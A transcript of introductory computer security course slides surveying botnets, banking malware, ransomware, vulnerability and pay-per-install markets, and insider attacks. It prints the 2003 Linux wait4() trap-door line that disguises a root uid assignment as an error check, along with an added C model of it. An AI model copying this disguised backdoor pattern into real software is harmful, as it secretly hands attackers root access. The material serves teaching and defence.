Dan Boneh COM-260 Computer & Network Security Course overview.

Presentation transcript:

The computer security problem
– Lots of buggy software
– Social engineering is very effective
– Money can be made from finding and exploiting vulns.
A software vulnerability is a security flaw, glitch, or weakness found in software or in an operating system (OS) that can lead to security concerns. An example of a software flaw is a buffer overflow.
1. Marketplace for vulnerabilities
2. Marketplace for owned machines (PPI)
3. Many methods to profit from owned machines
Current state of computer security

Lots of vulnerability disclosures (2015) source:

Vulnerable applications being exploited. Source: Kaspersky Security Bulletin 2015

Mobile malware (Nov – Oct. 2014)
Chart (x-axis: date): The rise of mobile banking Trojans (Kaspersky Security Bulletin 2014)

Introduction: Sample attacks

Why own machines: 1. IP address and bandwidth stealing
Attacker's goal: look like a random Internet user
Use the IP address of infected machine or phone for:
– Spam (e.g. the Storm botnet)
  Spamalytics: 1:12M pharma spams lead to purchase; 1:260K greeting card spams lead to infection
– Denial of Service: Services: 1 hour (20$), 24 hours (100$)
– Click fraud (e.g. Clickbot.a)

Why own machines: 2. Steal user credentials and inject ads
Keylog for banking passwords, web passwords, gaming pwds.
Example: SilentBanker (and many like it)
Man-in-the-Browser (MITB) diagram:
– User requests login page
– Bank sends login page needed to log in
– Malware injects Javascript
– When user submits information, also sent to attacker
Similar mechanism used by Zeus botnet

Lots of financial malware (Source: Kaspersky Security Bulletin 2015)
Chart callouts:
– size: 3.5 KB
– spread via attachments
– also found on home routers

Users attacked: stats (Source: Kaspersky Security Bulletin 2015)
– ≈ 300,000 users worldwide
– A worldwide problem

Why own machines: 3. Ransomware
CryptoWall (2014-)
– targets Windows
– spread by spam emails
– ≈ 200,000 machines in 2015
A worldwide problem.

Why own machines: 4. Spread to isolated systems
Example: Stuxnet
Windows infection ⇒ Siemens PCS 7 SCADA control software on Windows ⇒ Siemens device controller on isolated network
More on this later in course

Server-side attacks
Financial data theft: often credit card numbers
– Example: Target attack (2013), ≈ 140M CC numbers stolen
– Many similar (smaller) attacks since 2000
Political motivation:
– Aurora, Tunisia Facebook (Feb. 2011), GitHub (Mar. 2015)
Infect visiting users

Types of data stolen ( ) Source: California breach notification report, 2015

Example: Mpack
PHP-based tools installed on compromised web sites
– Embedded as an iframe on infected page
– Infects browsers that visit site
Features
– management console provides stats on infection rates
– Sold for several 100$
– Customer care can be purchased, one-year support contract
Impact: 500,000 infected sites (compromised via SQL injection)
– Several defenses: e.g. Google safe browsing

Insider attacks: example
Hidden trap door in Linux (Nov 2003)
– Allows attacker to take over a computer
– Practically undetectable change (uncovered via CVS logs)
Inserted line in wait4():
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
Looks like a standard error check, but …
See:
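Added example (not from the slides or the kernel source): a user-space model of the inserted line, showing why it never returns the error and instead sets the caller's uid to 0 when both flags are passed. The struct, the DEMO_ flag constants and the function names are constructed stand-ins for the kernel's task structure, __WCLONE and __WALL.

```c
#include <errno.h>
#include <stdio.h>

/* Constructed stand-ins for the kernel's __WCLONE and __WALL option flags. */
#define DEMO_WCLONE 0x80000000u
#define DEMO_WALL   0x40000000u

struct task { unsigned int uid; };   /* constructed stand-in for the task struct */

/* The line from the slide: '=' stores 0 (root) in uid. The assignment's value
 * is 0, so the && is false and retval is never set: no error is reported. */
static int check_backdoored(struct task *current, unsigned int options) {
    int retval = 0;
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* What a genuine error check would look like: '==' compares, uid is untouched. */
static int check_compare(struct task *current, unsigned int options) {
    int retval = 0;
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Runs one check on a task starting with start_uid; returns the uid afterwards. */
static unsigned int uid_after(int (*check)(struct task *, unsigned int),
                              unsigned int start_uid, unsigned int options,
                              int *retval) {
    struct task t = { start_uid };
    *retval = check(&t, options);
    return t.uid;
}

int main(void) {
    int rv;
    unsigned int magic = DEMO_WCLONE | DEMO_WALL;
    printf("backdoored, both flags: uid=%u retval=%d\n",
           uid_after(check_backdoored, 1000, magic, &rv), rv);
    printf("backdoored, one flag:   uid=%u retval=%d\n",
           uid_after(check_backdoored, 1000, DEMO_WALL, &rv), rv);
    printf("comparison, both flags: uid=%u retval=%d\n",
           uid_after(check_compare, 1000, magic, &rv), rv);
    return 0;
}
```

Because `&&` short-circuits, the assignment only runs for that exact flag combination, which is why ordinary callers never see a change in behaviour.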

Many more examples
– Access to SIPRnet and a CD-RW: 260,000 cables ⇒ Wikileaks
– SysAdmin for city of SF government. Changed passwords, locking out city from router access
– Inside logic bomb took down 2000 UBS servers
⋮
Can security technology help?

How companies lose data (Source: California breach notification report, 2015)
Chart categories: lost/stolen laptops, malware/phishing, insider attack, insider error
How do we have this data?

Introduction: The Marketplace for Vulnerabilities

Marketplace for Vulnerabilities
Option 1: bug bounty programs (many)
– Google Vulnerability Reward Program: up to $20K
– Microsoft Bounty Program: up to $100K
– Mozilla Bug Bounty program: $7500
– Pwn2Own competition: $15K
Option 2: Zero day initiative (ZDI), iDefense: $2K – $25K

Example: Mozilla

Marketplace for Vulnerabilities
Option 3: black market
Source: Andy Greenberg (Forbes, 3/23/2012)

Marketplace for owned machines
Pay-per-install (PPI) services
PPI operation:
1. Own victim's machine
2. Download and install client's code
3. Charge client
Diagram labels: clients (spam bot, keylogger), PPI service, Victims
Source: Caballero et al. (

Marketplace for owned machines
Diagram labels: clients (spam bot, keylogger), PPI service, Victims
Cost: US $ / 1000 machines
Asia - 7-8$ / 1000 machines
Source: Caballero et al. (

This course
Goals:
– Be aware of exploit techniques
– Learn to defend and avoid common exploits
– Learn to architect secure systems

This course
Part 1: basics (architecting for security)
– Securing apps, OS, and legacy code
– Isolation, authentication, and access control
Part 2: Web security (defending against a web attacker)
– Building robust web sites, understand the browser security model
Part 3: network security (defending against a network attacker)
– Monitoring and architecting secure networks.
Part 4: securing mobile applications

Don't try this at home!

Ken Thompson's clever Trojan